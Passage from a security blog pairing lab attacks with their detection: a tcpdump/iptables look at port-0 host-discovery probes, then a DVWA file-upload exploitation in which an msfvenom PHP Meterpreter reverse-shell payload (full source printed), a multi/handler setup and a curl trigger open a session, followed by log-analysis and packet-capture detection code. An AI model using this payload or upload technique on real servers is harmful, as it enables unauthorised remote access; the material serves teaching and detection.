<p></p><p>Rerunning the scan against port 0, the capture looks the same: SYNs in, no RST out, as expected, since the INPUT rule already drops the probe.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110.64965 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1541258948, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.64967 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1541390022, win 1024, options [mss 1460], length 0</span></span>
</pre></div>
<p></p><p>Peeking into the firewall to see whether any RST was generated and prevented from leaving, we see:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list OUTPUT --numeric --verbose</span>
<span style="color: white;">Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> 0 0 DROP </span></b><span style="color: white;"> tcp -- * ens33 0.0.0.0/0 0.0.0.0/0 tcp dpt:0 flags:0x04/0x04</span></span>
</pre></div>
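<p>Everything in this post was observed with <i>tcpdump</i> on the target, and that capture is exactly what a defender has to work with. The script below is an added example, not code from the original post. It classifies the host-discovery probes covered here (ICMP echo, timestamp and address mask requests, plus SYNs to TCP port 0) from <i>tcpdump -nnt</i> lines and reports, per scanning address, which probe kinds were sent and which ones the target actually answered, so every answered kind is a discovery path the firewall still allows. The sample lines are constructed to mirror the post's captures using the post's lab addresses; the script name in the usage comment is made up.</p>

```python
"""Added example (not code from the original post): classify the host-discovery
probes in `tcpdump -nnt` output and report which ones the target answered.

The sample lines below are constructed to match the tcpdump format shown in the
post; 10.0.0.110 (scanner) and 10.0.0.100 (target) are the post's lab addresses.
"""
import re
import sys
from collections import Counter, defaultdict

# Request text as tcpdump prints it -> (probe kind, text of the matching reply).
# ICMP types: echo 8/0, timestamp 13/14, address mask 17/18.
PROBES = {
    "ICMP echo request": ("icmp-echo", "ICMP echo reply"),
    "ICMP time stamp query": ("icmp-timestamp", "ICMP time stamp reply"),
    "ICMP address mask request": ("icmp-addrmask", "ICMP address mask reply"),
}

# Optional leading timestamp (tcpdump run without -t), then the IP line.
ICMP_RE = re.compile(r"^(?:\S+ )?IP (\S+) > (\S+): (ICMP [a-z ]+?(?:request|query|reply))")
TCP_RE = re.compile(r"^(?:\S+ )?IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]*)\]")


def classify(line):
    """Return (kind, src, dst, is_reply) for a discovery-relevant line, else None."""
    m = ICMP_RE.match(line)
    if m:
        src, dst, text = m.groups()
        for request_text, (kind, reply_text) in PROBES.items():
            if text == request_text:
                return kind, src, dst, False
            if text == reply_text:
                return kind, src, dst, True
        return None
    m = TCP_RE.match(line)
    if m:
        src, sport, dst, dport, flags = m.groups()
        # Nothing can legitimately listen on TCP port 0, so a bare SYN there is a
        # liveness probe, and a RST coming back from port 0 is the target answering it.
        if dport == "0" and flags == "S":
            return "tcp-port0-syn", src, dst, False
        if sport == "0" and "R" in flags:
            return "tcp-port0-syn", src, dst, True
    return None


def summarize(lines):
    """Per scanner address: how many probes of each kind were sent and answered."""
    report = defaultdict(lambda: {"sent": Counter(), "answered": Counter()})
    for line in lines:
        hit = classify(line.strip())
        if hit is None:
            continue
        kind, src, dst, is_reply = hit
        scanner = dst if is_reply else src          # replies flow back to the scanner
        report[scanner]["answered" if is_reply else "sent"][kind] += 1
    return dict(report)


def gaps(report, scanner):
    """Probe kinds the target answered: each one is a discovery path still open."""
    return sorted(kind for kind, n in report[scanner]["answered"].items() if n)


# Constructed sample in the post's tcpdump format: the scanner's four probe kinds,
# of which only echo and the port-0 SYN were answered, plus unrelated SSH traffic.
SAMPLE = """\
IP 10.0.0.110 > 10.0.0.100: ICMP echo request, id 59426, seq 0, length 8
IP 10.0.0.100 > 10.0.0.110: ICMP echo reply, id 59426, seq 0, length 8
IP 10.0.0.110 > 10.0.0.100: ICMP time stamp query id 7808 seq 0, length 20
IP 10.0.0.110 > 10.0.0.100: ICMP address mask request, length 12
IP 10.0.0.110.61475 > 10.0.0.100.0: Flags [S], seq 1785192689, win 1024, options [mss 1460], length 0
IP 10.0.0.100.0 > 10.0.0.110.61475: Flags [R.], seq 0, ack 1785192690, win 0, length 0
IP 10.0.0.120.51234 > 10.0.0.100.22: Flags [S], seq 11, win 64240, options [mss 1460], length 0
IP 10.0.0.100.22 > 10.0.0.120.51234: Flags [S.], seq 22, ack 12, win 65160, length 0
""".splitlines()


if __name__ == "__main__":
    # Usage (script name assumed):
    #   sudo tcpdump -nnti ens33 -l 'icmp or tcp port 0' | python3 probe_report.py
    lines = SAMPLE if sys.stdin.isatty() else sys.stdin
    for scanner, counts in summarize(lines).items():
        print(scanner, "sent:", dict(counts["sent"]), "answered:", dict(counts["answered"]),
              "open paths:", gaps(summarize(lines), scanner) if lines is SAMPLE else "")
```

<p>Run against the sample, the scanner 10.0.0.110 shows four probe kinds sent and two answered (<i>icmp-echo</i> and <i>tcp-port0-syn</i>), which maps directly onto the two rules this post ended up adding. The SSH connection from 10.0.0.120 is ignored, since a SYN to a real service is not a discovery probe by itself.</p>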
<p></p><p>The OUTPUT counter stays at zero: the RST was never generated, so there was nothing to drop. (And because an outbound reset would carry source port 0 rather than destination port 0, this <i>--dport 0</i> rule could not have matched one in any case.)</p><p>That covers the learnings for this example. No need to do anything else with it. </p><p>Main takeaway? Beyond ping, threat actors can determine whether a host is live using several seemingly simple reconnaissance techniques. We covered a few in this post; there are many more you can try on your own.</p><p><br />References:<br /><a href="https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol">Internet Control Message Protocol - Wikipedia</a><br /><a href="https://www.rfc-editor.org/rfc/rfc6918#section-2.4">RFC 6918: Formally Deprecating Some ICMPv4 Message Types (rfc-editor.org)</a><br /><a href="https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml">Internet Control Message Protocol (ICMP) Parameters (iana.org)</a><br /><a href="https://security.stackexchange.com/questions/183381/why-i-recived-user-set-on-my-nmap-analyze">Why I recived user-set on my Nmap analyze? 
- Information Security Stack Exchange</a><br /><a href="https://www.securitynik.com/2015/08/stimulus-and-response-revisited.html">Learning by practicing: Stimulus and response revisited (securitynik.com)</a><br /><a href="https://attack.mitre.org/">MITRE ATT&CK®</a><br /><a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html">Cyber Kill Chain® | Lockheed Martin</a><br /><a href="https://www.securitynik.com/2017/03/the-importance-of-reconnaissance-to.html">Learning by practicing: The importance of reconnaissance to the targeted threat actor (securitynik.com)</a><br /><a href="https://linux.die.net/man/1/nmap">nmap(1) - Linux man page (die.net)</a><br /><a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html">Learning by practicing: Building your own TCP 3-way handshake – Packet Crafting – The Scapy Way (securitynik.com)</a></p>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-89821285522684589362023-12-12T18:31:00.000-08:002023-12-12T18:43:20.424-08:00Beginning Nikto - File Upload Vulnerability testing<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata. 
</p><p><b><span style="font-size: medium;">The Hack - Beginning Nikto - File Upload Vulnerability testing</span></b></p><p>Trying a different scan by providing the entire URL:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_0]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106/dvwa/vulnerabilities/upload/ -ipv4 -Display 1 --ask no - -nossl -no404 -Tuning 0 </span>
</pre></div>
<p>Nothing much changed from what you saw in the earlier posts. Next, performing the exploit manually: in this case, I'm transitioning to manual exploitation of the file upload vulnerability.</p><p>Visit the file upload page within DVWA.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKZD0xVbUVXQ5Y6PpUBWwYemSfOAY5wvkqw92nfBRFRchbT5a_GD7RFVEMCUVg9uq61ufbNAfkvRkiI92HqH-Za176Wh3x9puSuzpMYpuUZr1cxG_OoKTjFzlrZPdu2QXKcxwPSnCYl3QbKgU1FxMs-sI6PArJntJP26CqhT5EB9Trz6qcoq7zD7hytQ/s891/File-upload-home-page.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="891" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKZD0xVbUVXQ5Y6PpUBWwYemSfOAY5wvkqw92nfBRFRchbT5a_GD7RFVEMCUVg9uq61ufbNAfkvRkiI92HqH-Za176Wh3x9puSuzpMYpuUZr1cxG_OoKTjFzlrZPdu2QXKcxwPSnCYl3QbKgU1FxMs-sI6PArJntJP26CqhT5EB9Trz6qcoq7zD7hytQ/w400-h201/File-upload-home-page.png" width="400" /></a></div><br /><p>Open the browser "<i>Web Developer Tools</i>" and select the "<i>Network</i>" tab. 
</p><p>Upload the file via the web application and we see the file successfully uploaded.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLBV3tRcuo40GdhSRvEa8mRPz4W3Qpn-j--gDwyMLrN47zqjc4zw9ZnhxPL-bmycPoKmWqjIPaeRS3sjZICTvHzppbnpNUnbxilkG9ZHMrbHC2NVJRQ0Q2V-ntA8ujtAk4uDlun9U8lNwpYZ0B3nMXc4TrEGw2tSiGsWgrg1oE18UVrv_s8dYnQ5hm6MQ/s564/generic_file_successfully_uploaded.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="564" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLBV3tRcuo40GdhSRvEa8mRPz4W3Qpn-j--gDwyMLrN47zqjc4zw9ZnhxPL-bmycPoKmWqjIPaeRS3sjZICTvHzppbnpNUnbxilkG9ZHMrbHC2NVJRQ0Q2V-ntA8ujtAk4uDlun9U8lNwpYZ0B3nMXc4TrEGw2tSiGsWgrg1oE18UVrv_s8dYnQ5hm6MQ/w400-h139/generic_file_successfully_uploaded.png" width="400" /></a></div><br /><p>The upload also confirms the location the file was uploaded to: "<i>./../hackable/uploads/hack_and_detect.png succesfully uploaded!</i>". This looks like two directories down from the current directory.</p><p>Revisiting the "<i>Web Developer Tools</i>", extracting a few lines of interest. First from the request:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Headers tab:</span>
<span style="color: white;"> ** </span>
<span style="color: white;"> scheme: http</span>
<span style="color: white;"> host: 10.0.0.106</span>
<span style="color: white;"> filename: /dvwa/vulnerabilities/upload/</span>
<span style="color: white;">Request tab:</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span style="color: white;"> Content-Disposition: form-data; name="MAX_FILE_SIZE"</span>
<span style="color: white;"> 100000</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span><span style="color: white;"> Content-Disposition: form-data; name="uploaded"; </span><b><span style="color: #fcff01;">filename="hack_and_detect.png</span></b><span style="color: white;">"</span></span>
<span style="color: white;"> Content-Type: image/png</span>
<span style="color: white;"> PNG</span>
<span style="color: white;"> </span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 0çJ3ÄÉæ} 6ý×</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span style="color: white;"> Content-Disposition: form-data; name="Upload"</span>
<span style="color: white;"> Upload</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877--</span>
</pre></div>
</div><div><br /></div><div>Looking at the "Response" tab:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">../../hackable/uploads/hack_and_detect.png succesfully uploaded!</span>
</pre></div>
</div><div><br />With this in place, can we use curl to get this file?<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ curl --request GET "http://10.0.0.106/dvwa/hackable/uploads/hack_and_detect.png" --output /tmp/hack_and_detect.png</span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;">100 64493 100 64493 0 0 7641k 0 --:--:-- --:--:-- --:--:-- 7872k</span>
</pre></div>
</div><div><br /></div><div><div>Verify the file was downloaded and its size:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ ls /tmp/hack_and_detect.png -l</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64493 Jun 22 15:25 /tmp/hack_and_detect.png</span>
</pre></div>
</div><div><br /></div><div>Open the file with "feh":</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwthZmFpWbRgdloAVvyKyekhfd-kbjUv00J0fcd_vskXnQQlYLn-kiw_bRktfA6J2wdsQYHd3cI4VUNe5FPo78HyicFvTBQ6guuuevLL4aotqBKGZE6SnSOl5KEB1GGwrl_LnmbAtJVrzDa2Zl-0ZWML9VPRpj0zj384epzXkahSJNgERkFeX85NiouDY/s262/feh-hack-detect.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="217" data-original-width="262" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwthZmFpWbRgdloAVvyKyekhfd-kbjUv00J0fcd_vskXnQQlYLn-kiw_bRktfA6J2wdsQYHd3cI4VUNe5FPo78HyicFvTBQ6guuuevLL4aotqBKGZE6SnSOl5KEB1GGwrl_LnmbAtJVrzDa2Zl-0ZWML9VPRpj0zj384epzXkahSJNgERkFeX85NiouDY/w400-h331/feh-hack-detect.png" width="400" /></a></div><br /></div><p>With confirmation that the file is in place, this means we may be able to upload other files.</p><p>Leveraging <i>msfvenom</i> to create a malicious PHP file.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.108 LPORT=9999 --format raw --out malicious.php</span>
<span style="color: white;">[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload</span>
<span style="color: white;">[-] No arch selected, selecting arch: php from the payload</span>
<span style="color: white;">No encoder specified, outputting raw payload</span>
<span style="color: white;">Payload size: 1111 bytes</span>
<span style="color: white;">Saved as: malicious.php</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>View the created code</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ cat malicious.php </span>
<span style="color: white;">/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();</span>
</pre></div>
<br /><div>Upload the malicious <i>.php</i> file, using the same process we did for the other files.</div><div><br /></div><div>Set up a resource file using the <i>multi-handler</i> to load with <i>msfconsole</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ cat dvwa.rc </span>
<span style="color: white;">#File Upload Vulnerability</span>
<span style="color: white;">use exploit/multi/handler</span>
<span style="color: white;">set PAYLOAD php/meterpreter/reverse_tcp</span>
<span style="color: white;">set LHOST 10.0.0.108</span>
<span style="color: white;">set LPORT 9999</span>
<span style="color: white;">exploit</span>
</pre></div><br /></div><div>Load up the resource file with <i>msfconsole</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ msfconsole --quiet --resource dvwa.rc </span>
<span style="color: white;">[*] Processing dvwa.rc for ERB directives.</span>
<span style="color: white;">resource (dvwa.rc)> use exploit/multi/handler</span>
<span style="color: white;">[*] Using configured payload generic/shell_reverse_tcp</span>
<span style="color: white;">resource (dvwa.rc)> set PAYLOAD php/meterpreter/reverse_tcp</span>
<span style="color: white;">PAYLOAD => php/meterpreter/reverse_tcp</span>
<span style="color: white;">resource (dvwa.rc)> set LHOST 10.0.0.108</span>
<span style="color: white;">LHOST => 10.0.0.108</span>
<span style="color: white;">resource (dvwa.rc)> set LPORT 9999</span>
<span style="color: white;">LPORT => 9999</span>
<span style="color: white;">resource (dvwa.rc)> exploit</span>
<span style="color: white;">[*] Started reverse TCP handler on 10.0.0.108:9999 </span>
</pre></div>
</div><div><br /></div><div><div>Use <i>curl</i> to access the <i>malicious.php</i> file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --request GET http://10.0.0.106/dvwa/hackable/uploads/malicious.php</span>
</pre></div>
</div><div><br /></div><div><div>At this point, curl hangs and the MSF handler opens a session.<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">[*] Sending stage (39927 bytes) to 10.0.0.106</span>
<span style="color: white;">[*] Meterpreter session 1 opened (10.0.0.108:9999 -> 10.0.0.106:49786) at 2023-06-22 15:29:04 -0400</span>
</pre></div>
</div><div><br /></div>Validate we have successfully gained access to the system.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">meterpreter > sysinfo </span>
<span style="color: white;">Computer : NIK-WIN-10</span>
<span style="color: white;">OS : Windows NT NIK-WIN-10 10.0 build 19044 (Windows 10) AMD64</span>
<span style="color: white;">Meterpreter : php/windows</span>
</pre></div>
</div><div><br /></div><div><div>While we can do more, there is no need for this at this point. Objective achieved!</div><div><br /></div><div>Exit Meterpreter:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">meterpreter > exit -j</span>
<span style="color: white;">[*] Shutting down Meterpreter...</span>
</pre></div>
</div><div><br /></div><div>Transitioning to log analysis.<br /><br /></div><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the HTTP <i>access.log</i> file, there is nothing standing out here. Realistically, the only question to be asked here is whether files should have been accessible from "<i>/dvwa/hackable/uploads</i>". Other than that, there is nothing here that stands out to me to suggest there was a problem.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"</span>
</pre></div>
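<p>As an added example (not part of the original post), here is a small Python checker that runs these same four <i>access.log</i> lines through two rules a defender would want: a server-side script served with a 200 from the uploads directory, and a successful POST to the upload form followed shortly by a GET from the same client. The DVWA paths are from the post; the script-extension list and the ten-minute window are assumptions.</p>

```python
"""Flag upload-then-execute activity in Apache combined-format access logs.

Added example for this post, not part of the original. The four sample lines are
copied from the access.log excerpt above; the DVWA paths come from the post, while
the script-extension list and the correlation window are assumptions.
"""
import re
from datetime import datetime, timedelta

# Apache "combined" LogFormat (assumed; it matches the excerpt above).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UPLOAD_ENDPOINT = "/dvwa/vulnerabilities/upload/"            # from the post
UPLOAD_DIR = "/hackable/uploads/"                            # from the post
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")   # assumed list
WINDOW = timedelta(minutes=10)                               # assumed window

SAMPLE_LOG = [  # copied from the access.log excerpt in the post
    '10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"',
    '10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"',
    '10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"',
    '10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"',
]


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    # Apache logs the path exactly as requested; "/dvwa//hackable" and
    # "/dvwa/hackable" name the same file, so collapse repeated slashes.
    rec["path"] = re.sub(r"/{2,}", "/", rec["path"])
    return rec


def find_suspicious(lines):
    """Return (rule, client_ip, path) findings in log order."""
    findings = []
    last_upload = {}   # client ip -> time of its latest successful POST to the form
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT and rec["status"] == 200:
            last_upload[ip] = rec["ts"]
            continue
        if rec["method"] == "GET" and UPLOAD_DIR in path and rec["status"] == 200:
            # Rule 1: a server-side script served from the uploads directory.
            if path.lower().endswith(SCRIPT_EXT):
                findings.append(("script-in-uploads", ip, path))
            # Rule 2: the same client posted to the upload form shortly before.
            posted = last_upload.get(ip)
            if posted is not None and rec["ts"] - posted <= WINDOW:
                findings.append(("upload-then-fetch", ip, path))
    return findings


if __name__ == "__main__":
    for rule, ip, path in find_suspicious(SAMPLE_LOG):
        print(f"{rule:18} {ip} {path}")
```

Run against the excerpt, the PNG fetch is reported only because it followed an upload, while <i>malicious.php</i> trips both rules.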
<br />Transitioning to packet analysis.<div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br /></div><div>Set up for packet analysis: capture packets on ports 80, 443 or 9999.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -w ./file_upload.pcap -f 'tcp port(80 or 443 or 9999)' --interface eth0 </span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:213735) 14:10:39.726904 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:213735) 14:10:39.726964 [Main MESSAGE] -- File: "./file_upload.pcap"</span>
</pre></div>
